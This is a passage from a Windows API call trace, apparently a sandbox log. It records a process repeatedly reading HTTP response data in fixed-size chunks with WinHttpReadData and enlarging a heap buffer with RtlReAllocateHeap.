Ptr=0x9630080, Size=0x9d800) returned 0x9630080 [0204.155] WinHttpReadData (in: hRequest=0x3eeadd0, lpBuffer=0x96cb080, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x96cb080*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0204.186] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x9630080, Size=0xa0000) returned 0x9630080 [0204.186] WinHttpReadData (in: hRequest=0x3eeadd0, lpBuffer=0x96cd880, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x96cd880*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0204.187] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x9630080, Size=0xa2800) returned 0x9630080 [0204.187] WinHttpReadData (in: hRequest=0x3eeadd0, lpBuffer=0x96d0080, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x96d0080*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0204.188] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x9630080, Size=0xa5000) returned 0x9630080 [0204.188] WinHttpReadData (in: hRequest=0x3eeadd0, lpBuffer=0x96d2880, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x96d2880*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0204.189] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x9630080, Size=0xa7800) returned 0x9630080 [0204.189] WinHttpReadData (in: hRequest=0x3eeadd0, lpBuffer=0x96d5080, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x96d5080*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0204.189] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x9630080, Size=0xaa000) returned 0x9630080 [0204.189] WinHttpReadData (in: hRequest=0x3eeadd0, lpBuffer=0x96d7880, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x96d7880*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0204.190] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x9630080, Size=0xac800) returned 0x9630080 [0204.190] WinHttpReadData (in: hRequest=0x3eeadd0, lpBuffer=0x96da080, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x96da080*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0204.190] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x9630080, Size=0xaf000) returned 0x9630080 [0204.190] WinHttpReadData (in: hRequest=0x3eeadd0, lpBuffer=0x96dc880, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x96dc880*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0204.191] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x9630080, Size=0xb1800) returned 0x9630080 [0204.191] WinHttpReadData (in: hRequest=0x3eeadd0, lpBuffer=0x96df080, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x96df080*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0204.191] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x9630080, Size=0xb4000) returned 0x9630080 [0204.191] WinHttpReadData (in: hRequest=0x3eeadd0, lpBuffer=0x96e1880, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x96e1880*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0204.191] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x9630080, Size=0xb6800) returned 0x9630080 [0204.191] WinHttpReadData (in: hRequest=0x3eeadd0, lpBuffer=0x96e4080, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x96e4080*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0204.192] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x9630080, Size=0xb9000) returned 0x9630080 [0204.192] WinHttpReadData (in: hRequest=0x3eeadd0, lpBuffer=0x96e6880, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x96e6880*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0204.193] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x9630080, Size=0xbb800) returned 0x9630080 [0204.193] WinHttpReadData (in: hRequest=0x3eeadd0, lpBuffer=0x96e9080, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x96e9080*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0204.194] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x9630080, Size=0xbe000) returned 0x9630080 [0204.194] WinHttpReadData (in: hRequest=0x3eeadd0, lpBuffer=0x96eb880, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x96eb880*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0204.194] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x9630080, Size=0xc0800) returned 0x9630080 [0204.194] WinHttpReadData (in: hRequest=0x3eeadd0, lpBuffer=0x96ee080, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x96ee080*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0204.197] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x9630080, Size=0xc3000) returned 0x9630080 [0204.197] WinHttpReadData (in: hRequest=0x3eeadd0, lpBuffer=0x96f0880, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x96f0880*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0204.200] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x9630080, Size=0xc5800) returned 0x9630080 [0204.200] WinHttpReadData (in: hRequest=0x3eeadd0, lpBuffer=0x96f3080, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x96f3080*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0204.242] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x9630080, Size=0xc8000) returned 0x9630080 [0204.242] WinHttpReadData (in: hRequest=0x3eeadd0, lpBuffer=0x96f5880, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x96f5880*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0204.243] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x9630080, Size=0xca800) returned 0x9630080 [0204.243] WinHttpReadData (in: hRequest=0x3eeadd0, lpBuffer=0x96f8080, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x96f8080*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0204.243] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x9630080, Size=0xcd000) returned 0x9630080 [0204.243] WinHttpReadData (in: hRequest=0x3eeadd0, lpBuffer=0x96fa880, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x96fa880*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0204.244] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x9630080, Size=0xcf800) returned 0x9630080 [0204.244] WinHttpReadData (in: hRequest=0x3eeadd0, lpBuffer=0x96fd080, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x96fd080*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0204.244] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x9630080, Size=0xd2000) returned 0x9630080 [0204.244] WinHttpReadData (in: hRequest=0x3eeadd0, lpBuffer=0x96ff880, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x96ff880*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0204.247] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x9630080, Size=0xd4800) returned 0x9630080 [0204.247] WinHttpReadData (in: hRequest=0x3eeadd0, lpBuffer=0x9702080, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x9702080*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0204.249] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x9630080, Size=0xd7000) returned 0x9630080 [0204.249] WinHttpReadData (in: hRequest=0x3eeadd0, lpBuffer=0x9704880, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x9704880*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0204.251] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x9630080, Size=0xd9800) returned 0x9630080 [0204.251] WinHttpReadData (in: hRequest=0x3eeadd0, lpBuffer=0x9707080, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x9707080*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0204.254] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x9630080, Size=0xdc000) returned 0x9a80240 [0204.269] WinHttpReadData (in: hRequest=0x3eeadd0, lpBuffer=0x9b59a40, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x9b59a40*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0204.270] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x9a80240, Size=0xde800) returned 0x9b5c250 [0204.284] WinHttpReadData (in: hRequest=0x3eeadd0, lpBuffer=0x9c38250, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x9c38250*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0204.284] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x9b5c250, Size=0xe1000) returned 0x7c40080 [0204.339] WinHttpReadData (in: hRequest=0x3eeadd0, lpBuffer=0x7d1e880, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x7d1e880*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0204.340] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x7c40080, Size=0xe3800) returned 0x9a80240 [0204.357] WinHttpReadData (in: hRequest=0x3eeadd0, lpBuffer=0x9b61240, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x9b61240*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0204.450] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x9a80240, Size=0xe6000) returned 0x9b63a50 [0204.461] WinHttpReadData (in: hRequest=0x3eeadd0, lpBuffer=0x9c47250, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x9c47250*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0204.512] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x9b63a50, Size=0xe8800) returned 0x7c40080 [0204.529] WinHttpReadData (in: hRequest=0x3eeadd0, lpBuffer=0x7d26080, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x7d26080*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0204.529] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x7c40080, Size=0xeb000) returned 0x7c40080 [0204.530] WinHttpReadData (in: hRequest=0x3eeadd0, lpBuffer=0x7d28880, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x7d28880*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0204.530] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x7c40080, Size=0xed800) returned 0x7c40080 [0204.530] WinHttpReadData (in: hRequest=0x3eeadd0, lpBuffer=0x7d2b080, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x7d2b080*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0204.530] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x7c40080, Size=0xf0000) returned 0x7c40080 [0204.530] WinHttpReadData (in: hRequest=0x3eeadd0, lpBuffer=0x7d2d880, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x7d2d880*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0204.531] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x7c40080, Size=0xf2800) returned 0x7c40080 [0204.531] WinHttpReadData (in: hRequest=0x3eeadd0, lpBuffer=0x7d30080, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x7d30080*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0204.531] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x7c40080, Size=0xf5000) returned 0x7c40080 [0204.531] WinHttpReadData (in: hRequest=0x3eeadd0, lpBuffer=0x7d32880, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x7d32880*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0204.531] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x7c40080, Size=0xf7800) returned 0x7c40080 [0204.531] WinHttpReadData (in: hRequest=0x3eeadd0, lpBuffer=0x7d35080, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x7d35080*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0204.532] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x7c40080, Size=0xfa000) returned 0x7c40080 [0204.532] WinHttpReadData (in: hRequest=0x3eeadd0, lpBuffer=0x7d37880, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x7d37880*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0204.532] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x7c40080, Size=0xfc800) returned 0x7c40080 [0204.532] WinHttpReadData (in: hRequest=0x3eeadd0, lpBuffer=0x7d3a080, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x7d3a080*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0204.532] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x7c40080, Size=0xff000) returned 0x2670040 [0204.607] WinHttpReadData (in: hRequest=0x3eeadd0, lpBuffer=0x276c840, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x276c840*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0204.682] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x2670040, Size=0x101800) returned 0x6670040 [0204.702] WinHttpReadData (in: hRequest=0x3eeadd0, lpBuffer=0x676f040, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x676f040*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0204.746] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x6670040, Size=0x104000) returned 0x2670040 [0204.772] WinHttpReadData (in: hRequest=0x3eeadd0, lpBuffer=0x2771840, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x2771840*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0204.772] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x2670040, Size=0x106800) returned 0x6670040 [0204.791] WinHttpReadData (in: hRequest=0x3eeadd0, lpBuffer=0x6774040, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x6774040*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0204.813] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x6670040, Size=0x109000) returned 0x2670040 [0204.832] WinHttpReadData (in: hRequest=0x3eeadd0, lpBuffer=0x2776840, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x2776840*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0204.871] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x2670040, Size=0x10b800) returned 0x46a0040 [0204.956] WinHttpReadData (in: hRequest=0x3eeadd0, lpBuffer=0x47a9040, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x47a9040*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0204.972] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x46a0040, Size=0x10e000) returned 0x2670040 [0204.991] WinHttpReadData (in: hRequest=0x3eeadd0, lpBuffer=0x277b840, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x277b840*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0204.992] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x2670040, Size=0x110800) returned 0x46a0040 [0205.012] WinHttpReadData (in: hRequest=0x3eeadd0, lpBuffer=0x47ae040, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x47ae040*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0205.013] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x46a0040, Size=0x113000) returned 0x6670040 [0205.033] WinHttpReadData (in: hRequest=0x3eeadd0, lpBuffer=0x6780840, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x6780840*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0205.034] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x6670040, Size=0x115800) returned 0x46a0040 [0205.054] WinHttpReadData (in: hRequest=0x3eeadd0, lpBuffer=0x47b3040, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x47b3040*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0205.054] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x46a0040, Size=0x118000) returned 0x6670040 [0205.075] WinHttpReadData (in: hRequest=0x3eeadd0, lpBuffer=0x6785840, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x6785840*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0205.075] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x6670040, Size=0x11a800) returned 0x46a0040 [0205.095] WinHttpReadData (in: hRequest=0x3eeadd0, lpBuffer=0x47b8040, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x47b8040*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0205.095] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x46a0040, Size=0x11d000) returned 0x6670040 [0205.165] WinHttpReadData (in: hRequest=0x3eeadd0, lpBuffer=0x678a840, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x678a840*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0205.171] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x6670040, Size=0x11f800) returned 0x46a0040 [0205.191] WinHttpReadData (in: hRequest=0x3eeadd0, lpBuffer=0x47bd040, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x47bd040*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0205.192] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x46a0040, Size=0x122000) returned 0x6670040 [0205.213] WinHttpReadData (in: hRequest=0x3eeadd0, lpBuffer=0x678f840, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x678f840*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0205.214] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x6670040, Size=0x124800) returned 0x46a0040 [0205.242] WinHttpReadData (in: hRequest=0x3eeadd0, lpBuffer=0x47c2040, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x47c2040*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0205.242] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x46a0040, Size=0x127000) returned 0x6670040 [0205.265] WinHttpReadData (in: hRequest=0x3eeadd0, lpBuffer=0x6794840, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x6794840*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0205.265] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x6670040, Size=0x129800) returned 0x46a0040 [0205.342] WinHttpReadData (in: hRequest=0x3eeadd0, lpBuffer=0x47c7040, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x47c7040*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0205.343] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x46a0040, Size=0x12c000) returned 0x6670040 [0205.364] WinHttpReadData (in: hRequest=0x3eeadd0, lpBuffer=0x6799840, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x6799840*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0205.365] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x6670040, Size=0x12e800) returned 0x46a0040 [0205.389] WinHttpReadData (in: hRequest=0x3eeadd0, lpBuffer=0x47cc040, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x47cc040*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0205.389] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x46a0040, Size=0x131000) returned 0x6670040 [0205.412] WinHttpReadData (in: hRequest=0x3eeadd0, lpBuffer=0x679e840, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x679e840*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0205.412] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x6670040, Size=0x133800) returned 0x6db0040 [0205.436] WinHttpReadData (in: hRequest=0x3eeadd0, lpBuffer=0x6ee1040, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x6ee1040*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0205.436] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x6db0040, Size=0x136000) returned 0x6670040 [0205.501] WinHttpReadData (in: hRequest=0x3eeadd0, lpBuffer=0x67a3840, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x67a3840*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0205.522] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x6670040, Size=0x138800) returned 0x6db0040 [0205.545] WinHttpReadData (in: hRequest=0x3eeadd0, lpBuffer=0x6ee6040, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x6ee6040*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0205.545] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x6db0040, Size=0x13b000) returned 0x6670040 [0205.569] WinHttpReadData (in: hRequest=0x3eeadd0, lpBuffer=0x67a8840, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x67a8840*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0205.569] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x6670040, Size=0x13d800) returned 0x6db0040 [0205.593] WinHttpReadData (in: hRequest=0x3eeadd0, lpBuffer=0x6eeb040, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x6eeb040*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0205.598] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x6db0040, Size=0x140000) returned 0x6670040 [0205.626] WinHttpReadData (in: hRequest=0x3eeadd0, lpBuffer=0x67ad840, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x67ad840*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0205.627] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x6670040, Size=0x142800) returned 0x6db0040 [0205.689] WinHttpReadData (in: hRequest=0x3eeadd0, lpBuffer=0x6ef0040, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x6ef0040*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0205.711] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x6db0040, Size=0x145000) returned 0x6670040 [0205.737] WinHttpReadData (in: hRequest=0x3eeadd0, lpBuffer=0x67b2840, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x67b2840*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0205.737] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x6670040, Size=0x147800) returned 0x6db0040 [0205.767] WinHttpReadData (in: hRequest=0x3eeadd0, lpBuffer=0x6ef5040, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x6ef5040*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0205.768] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x6db0040, Size=0x14a000) returned 0x6670040 [0205.839] WinHttpReadData (in: hRequest=0x3eeadd0, lpBuffer=0x67b7840, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x67b7840*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0205.901] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x6670040, Size=0x14c800) returned 0x6db0040 [0205.955] WinHttpReadData (in: hRequest=0x3eeadd0, lpBuffer=0x6efa040, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x6efa040*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0205.987] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x6db0040, Size=0x14f000) returned 0x6670040 [0206.018] WinHttpReadData (in: hRequest=0x3eeadd0, lpBuffer=0x67bc840, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x67bc840*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0206.018] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x6670040, Size=0x151800) returned 0x6db0040 [0206.052] WinHttpReadData (in: hRequest=0x3eeadd0, lpBuffer=0x6eff040, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x6eff040*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0206.052] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x6db0040, Size=0x154000) returned 0x6670040 [0206.136] WinHttpReadData (in: hRequest=0x3eeadd0, lpBuffer=0x67c1840, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x67c1840*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0206.184] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x6670040, Size=0x156800) returned 0x6db0040 [0206.246] WinHttpReadData (in: hRequest=0x3eeadd0, lpBuffer=0x6f04040, dwNumberOfBytesToRead=0x2800, 